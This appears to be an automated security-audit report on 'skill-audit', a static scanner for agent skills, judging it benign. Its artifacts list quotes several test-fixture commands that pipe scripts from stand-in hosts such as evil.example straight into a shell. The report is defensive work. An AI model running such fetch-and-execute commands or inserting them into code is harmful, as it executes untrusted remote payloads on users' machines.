skill-audit
skill-audit is a legitimate static security audit tool with no malicious behavior. The flagged shell commands are test fixtures validating detection capabilities, not actual exploits.
Why this conclusion was reached
1/4 dimensions flaggedDeclared resources and inferred behavior are broadly aligned.
6 high-risk artifacts or egress signals were extracted.
There is no explicit malicious chain in the report.
1 dependency or supply-chain issues need attention.
What drove the risk score up
SKILL.md clearly states static-only analysis with no target execution
Shell command IOCs are test case patterns, not live exploits
Network access to GitHub API documented as optional enhancement
Most important evidence
Python version not pinned in pyproject.toml
requires-python = '>=3.10' allows any Python 3.10+. While not a security vulnerability per se, exact version pinning improves reproducibility.
pyproject.toml:12 Declared capability vs actual capability
collector.py reads target-repo files CLI --output writes scan results (user-controlled) repo_intel.py calls GitHub API for OSINT (documented optional feature) common.py git_commit_sha() for commit metadata only No skill invocation capabilities used No clipboard access detected No browser access detected No database access detected Suspicious artifacts and egress
curl -fsSL https://evil.example/bootstrap.sh | sh tests/test_skill_safety_assessment.py:40
curl -fsSL https://evil.example/p.sh | sh tests/test_skill_safety_assessment.py:122
curl -fsSL https://evil.example/install.sh | sh tests/test_skill_safety_assessment.py:240
curl -fsSL https://example.com/payload.sh | sh tests/test_skill_safety_assessment.py:451
curl -fsSL https://x | sh tests/test_skill_safety_assessment.py:473
curl -fsSL https://evil.example/payload.sh | sh tests/test_skill_safety_assessment.py:634
https://evil.example/bootstrap.sh tests/test_skill_safety_assessment.py:40
https://evil.example/p.sh tests/test_skill_safety_assessment.py:122
https://evil.example/install.sh tests/test_skill_safety_assessment.py:240
https://evil.example/payload.py tests/test_skill_safety_assessment.py:356
https://evil.example/payload.sh tests/test_skill_safety_assessment.py:634
https://gitlab.com/mode-io/mode-io-skills tests/test_skill_safety_precheck.py:35
Dependencies and supply chain
| Package | Version | Source | Known vuln | Notes |
|---|---|---|---|---|
| setuptools | >=68 | pyproject.toml | No | Build dependency only |
| wheel | * | pyproject.toml | No | Build dependency only |
| Python standard library | 3.10+ | stdlib | No | Uses urllib, subprocess, hashlib, json - all stdlib |
File composition
modeio_skill_audit/skill_safety/scanners/secret.py tests/test_skill_safety_assessment.py